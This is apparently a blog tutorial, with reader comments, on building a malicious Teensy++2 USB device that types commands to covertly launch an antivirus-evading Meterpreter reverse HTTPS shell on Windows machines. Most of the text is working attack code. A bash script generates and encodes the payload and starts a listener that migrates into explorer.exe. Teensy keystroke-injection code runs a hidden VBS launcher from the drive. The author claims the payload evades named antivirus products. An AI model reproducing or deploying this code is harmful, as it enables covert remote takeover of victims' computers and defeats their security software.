Avoiding anti-virus software in order to execute our payloads off Teensy is my next exercise. Lately most of the Metasploit generated loaders get detected. There are various techniques to bypass this detection. I stumbled across Bernardo Dameles blogpost and decided to use his technique on a Teensy++2
The original article is here execute-metasploit-payloads-bypassing.html
All the steps here are already covered in the previous article here Teensy2-0-and-metasploit So once again with our Teensy and Arduino programming enviroment set-up on our linux box we can create a new project “trojaned-usbdrive” for example
Our code is a little different than previously (Again place this in the Metasploit root folder)
#!/bin/bash
echo "************************************************************"
echo " Automatic shellcode generator "
echo " "
echo "************************************************************"
echo -e "What Port Number are we gonna listen to? : \c"
read port
# Get OS name
OS=`uname`
IO="" # store IP
case $OS in
Linux) IP=`ifconfig tun0 | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
FreeBSD|OpenBSD) IP=`ifconfig tun0 | grep -E 'inet.[0-9]' | grep -v '127.0.0.1' | awk '{ print $2}'` ;;
SunOS) IP=`ifconfig -a | grep inet | grep -v '127.0.0.1' | awk '{ print $2} '` ;;
*) IP="Unknown";;
esac
#echo "$IP"
./msfpayload windows/meterpreter/reverse_https LHOST=$IP LPORT=$port EXITFUNC=process R | ./msfencode -e x86/alpha_mixed -t raw BufferRegister=EAX > alphacode
if [ ! -d "$ShellCode" ]; then
mkdir ShellCode
fi
mv alphacode ShellCode
echo -e "a.exe \c" > ShellCode/run.bat
cat ShellCode/alphacode >> ShellCode/run.bat
rm ShellCode/alphacode
mv ShellCode/run.bat /home/knoppix/arduino-0022/trojaned_usbdrive/disk
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_https LHOST=$IP LPORT=$port AutoRunScript='migrate explorer.exe' E
We are using Alpha_mixed encoding to create our Meterpreter shellcode. What happens here is that reverse_https meterpreter payload is encoded via msfencode using Alpha-mixed chars, file is dumped as alphacode to Shellcode subdirectory and run.bat gets created there as well. Then it moves the run.bat into the project directory of you arduino installation folder (trojaned_usbdrive) in this example and starts the multi handler listener.
Now we need to get the shellcodexec win32 binary from github.com/inquisb/shellcodeexec You can get the sources there and compile it for x64 too. In this example I named the file a.exe and moved it into the disk folder in the “trojaned-usbdrive” project folder.
Next we have the Teensy++2 code that loads everything:
#include <phukdlib.h>
void setup() {
}
void loop () {
delay(9000);
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.send_now();
Keyboard.set_key1(KEY_ESC);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
Keyboard.print("powershell");
PressAndRelease(KEY_ENTER,1);
delay(8000);
Keyboard.print("$disk = wmic logicaldisk list brief | select-string -pattern tinydisk | out-string");
PressAndRelease(KEY_ENTER,1);
delay(1000);
Keyboard.print("$drive = $disk.substring(2,2)");
PressAndRelease(KEY_ENTER,1);
delay(1000);
Keyboard.print("cd $drive");
PressAndRelease(KEY_ENTER,1);
delay(500);
Keyboard.print("invoke-expression $drive");
Keyboard.set_key1 (KEY_BACKSLASH);
Keyboard.send_now();
Keyboard.print("exec.vbs");
PressAndRelease(KEY_ENTER,1);
delay(1000);
Keyboard.print("exit");
PressAndRelease(KEY_ENTER,1);
delay(9000000);
}
Our exec.vbs is almost the same as before to make sure the whole process is invisible to the user..
Set oShell = CreateObject("Wscript.shell")
sPath=Wscript.ScriptFullName
x=InstrRev(sPath, "\")
sPath=Left(sPath,x)
sCmd = sPath+"run.bat"
oShell.Run sCmd,0,False
So you need 3 files in the trojaned-usbdrive folder : a.exe run.bat and exec.vbs. When this loads its fast, silent and does not leave too much noise on the screen.
This should get by most of antivirus software undetected. (Tested against Trend Micro, Kaspersky …)
Part 3… The Final Product
Hi,
i get different character when i connect the teensy to the usb, i get a ì instead of ‘=’ and cannot execute the code… how can i do to get a = (equal) instead ì ?
thanks
Hi
where exactly do you have the problem with equals ? is it in the Keyboard.print(“$disk = wmic … command here ? If this is the case you can split the command and use the KEY_EQUAL instead. Look here for info
http://www.pjrc.com/teensy/usb_keyboard.html
So you would do this :
Keyboard.print(“$disk);
Keyboard.set_key1 (KEY_EQUAL);
Keyboard.print(” wmic logicaldisk list brief | sel….);
etc….
hi,
thanks for reply, i try to do how you suggest but i get same result.
I resolved the problem changing keyboard layout in wondows ro english, with my default italian keyboard i get bad character, with english the teensy found :)
thanks again for reply